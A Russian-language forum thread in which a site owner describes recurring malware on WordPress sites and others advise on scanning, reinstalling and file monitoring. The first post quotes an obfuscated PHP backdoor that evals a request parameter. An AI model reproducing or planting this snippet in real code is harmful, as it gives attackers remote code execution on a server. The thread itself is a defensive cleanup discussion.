Может и не совсем в тот раздел, но грешу на WP. На хостинге висит 8 сайтов. В основном все на wp, один на opencart. B 2 сайта постоянно обрастают трипаками - на wp 4.8.2. Хостер блокирует исходящую почту, присылает отчет virusdie, я ручками вычищаю всё, снимаю блокировку почты...через неделю полторы ситуация повторяется. Я думаю, что проблема в WP. Пароли сменял все которые тока можно: личный кабинет хостера, панель управления, ftp, админка, базы данных. Ничё не помогает, зараза всё равно возвращается. Может virusdie не полностью всё вылавливает и остаётся где-то плодящаяся царевна-лягушка? Гадость встраивается в начало существующих файлов или, что реже, создаёт свои. Выглядит так PHP: <?php $d4l='lEIC23evK($6ahf\'tis4cO_43266c';if(isset(${$d4l[22].$d4l[3].$d4l[21].$d4l[21].$d4l[8].$d4l[2].$d4l[1]}[$d4l[13].$d4l[19].$d4l[5].$d4l[4].$d4l[11].$d4l[11].$d4l[20]])){eval(${$d4l[22].$d4l[3].$d4l[21].$d4l[21].$d4l[8].$d4l[2].$d4l[1]}[$d4l[13].$d4l[19].$d4l[5].$d4l[4].$d4l[11].$d4l[11].$d4l[20]]);} ?> Куда ещё копать? Какие мысли?
Возможно на сайте есть shell. поэтому просто смена паролей не поможет. Надо скачать эти сайты себе и проверить на вирусы, Kaspersky Virus Removal Tool и Dr.Web CureIt!, они бесплатные, работают без установки. Если ничего не найдут, то обновить CMS до последней версии, даже если эта версия и установлена, вирусы могут дописываться в существующие файлы. Удалить модули, причем как в админке, так потом и вручную файлы, если что-то останется, на случай, если вирус был в каком-либо модуле. Самый крайний случай, заново установить чистый WP и добавлять на него все данные и модули, нужные для работы данных сайтов.
pasha-b, Kaspersky Virus Removal Tool и Dr.Web CureIt! говорят, что всё чисто. Надо с мыслями собраться и браться за переустановку плагинов :( Установил плагин Exploit Scanner. Он нашел ещё пару фалов с base64 кодом, который virusdie пропустил.
Так и есть, шелл остается в директории. Посмотрите внимательно все файлы в директории, там могут быть посторонние с вредоносным кодом. Попросите хостера пройтись clamav, он нормально находит шеллы + еще очень хорош Linux Malware Detect (LMD). Можно попробовать поставить этот плагин и вычислить когда меняются файлы, может в логах на хостинге будет видно с какого скрипта выполняется код. Еще можно вот эти попробовать - И для безопасности вот этот плагин - https://wordpress.org/plugins/better-wp-security/
А по базе данных чем можно? Много чего гугл выдаёт, проверенного бы хотелось софта. Bnopen, по поводу clama что-то в рег.ру забубнили, мол он у них только на win серверах и вообще они за 250 рублей чистят только то, что нашел их virusdie . Я в результате сайты скачал к себе на локалку clamwin(вебом, каспером) прошелся - чисто. Установил монитор изменения файлов...ждём. Sucuri постоянно шлёт отчет, что кто-то пытается залогиниться под admin(у меня логин не такой конечно же) с разных ip.
можно поменять url для авторизации и такие уведомления сразу отпадут. Бд надо качать к себе на локалку и проверять на вхождение iframe, base64 и прочей гадости. Насчет софта даже не знаю, что посоветовать. Но в бд код с вирусней реже бывает, разве что поломали только бд и узнали пароль к ней. Обычно в контент тогда вставляют всякие ифреймы на партнерки.
Помимо сайтов, проверьте и другие папки на хостинге. Обычно сайты находятся в папке public_html или domains, от настроек хостинга зависит, помимо этих папок есть еще, особенно посмотреть на папки tmp или temp.
Чисто, да и вообще...тьфу, тьфу, тьфу...вроде тишина уже четыре полных дня прошло. Единственное - сегодня sucuri сказал, что у меня изменился .htaccess. Как так? Если у меня на него права стоят 444? Он даже меня на редактирование не пускает!
